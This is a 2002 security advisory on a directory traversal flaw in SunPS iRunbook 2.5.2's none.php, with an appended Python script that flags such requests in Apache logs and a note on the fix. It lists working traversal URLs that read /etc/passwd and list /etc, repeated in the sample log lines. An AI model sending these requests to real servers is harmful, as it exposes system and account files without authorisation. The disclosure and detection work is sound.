Portcullis Security Advisory

Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

Vulnerability discovery and development:
John Clayton, Portcullis Security Testing Services Team Leader

Affected system:
SunPS iRunbook Version 2.5.2 complied by Mike Corlett - 15:00 - 8th January 2002
running on Apache 1.3.22 with PHP 4.0.6
Kernel version: SunOS 5.8 Generic 108528-12 September 2001
System Type: SUNW,Sun-Blade-100

Details:
The file none.php, used in iRunbook Explorer to view files from the build snapshot, can be manipulated to view any file or folder on the server, provided the web server user has read access to the file and directory.

This was initially achieved by studying the request strings in the links used to view files in the build report and seeing that they request file paths with ":" instead of the usual "/". Thus it was possible to use directory traversal to view any file or folder.

Later it was discovered that the "..:..:" sequence is not needed to traverse directories; the path to the file just needs to be entered in the web browser after the "?".

Impact:
Any user who can access the web server can view files and directories on the system that are usually world readable, such as /etc/ and /etc/passwd.

Exploit:
View the passwd file:

http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:

or

http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd

View the contents of the /etc directory:

http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:

or

http://<Serverip:port>/content/base/build/explorer/none.php?/etc/

Copyright:
Copyright © Portcullis Computer Security Limited 2002, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

John Clayton
Portcullis Computer Security Ltd.
Security Testing Services Team Leader and Dragon IDS Technical Product Manager
www.portcullis-security.com
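
Added example (not part of the Portcullis advisory and not iRunbook code): a log check that resolves each none.php query string the way the Details section describes, treating ":" as "/" and accepting a plain path after the "?", and reports requests that land outside the build snapshot. The snapshot root, the in-root file name and the log lines are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed snapshot root; the advisory does not give the real directory.
SNAPSHOT_ROOT = "/opt/irunbook/snapshot"

# Request field of an Apache access-log line that targets none.php.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) \S*/explorer/none\.php\?(\S*) HTTP/[\d.]+"')


def resolve(query, root=SNAPSHOT_ROOT):
    """Return the absolute path a none.php query string names."""
    # Decode first so %2e%2e and %3a variants resolve like ".." and ":",
    # then map the ':' separator seen in the report links to '/'.
    path = unquote(query).replace(":", "/")
    # posixpath.join drops `root` when `path` is absolute, which models the
    # "path entered directly after the ?" case.
    return posixpath.normpath(posixpath.join(root, path))


def escapes_root(query, root=SNAPSHOT_ROOT):
    """True when the resolved path is not the root or something beneath it."""
    target = resolve(query, root)
    return target != root and not target.startswith(root + "/")


def suspicious_requests(log_lines, root=SNAPSHOT_ROOT):
    """Return (client, resolved_path) for none.php requests leaving the root."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if match and escapes_root(match.group(1), root):
            hits.append((line.split()[0], resolve(match.group(1), root)))
    return hits


# Constructed log lines (documentation addresses, invented in-root file name).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2002:15:04:11 +0000] "GET /content/base/build/'
    'explorer/none.php?..:..:..:..:..:..:..:etc:passwd: HTTP/1.0" 200 812',
    '192.0.2.44 - - [08/Jan/2002:15:05:02 +0000] "GET /content/base/build/'
    'explorer/none.php?reports:build.log HTTP/1.0" 200 4096',
    '198.51.100.7 - - [08/Jan/2002:15:06:40 +0000] "GET /content/base/build/'
    'explorer/none.php?/etc/ HTTP/1.0" 200 2310',
]
```

The same resolve-then-compare test, applied inside the script before the file is opened, is the usual fix for this class of bug: canonicalise the requested path and refuse anything that is not beneath the snapshot root.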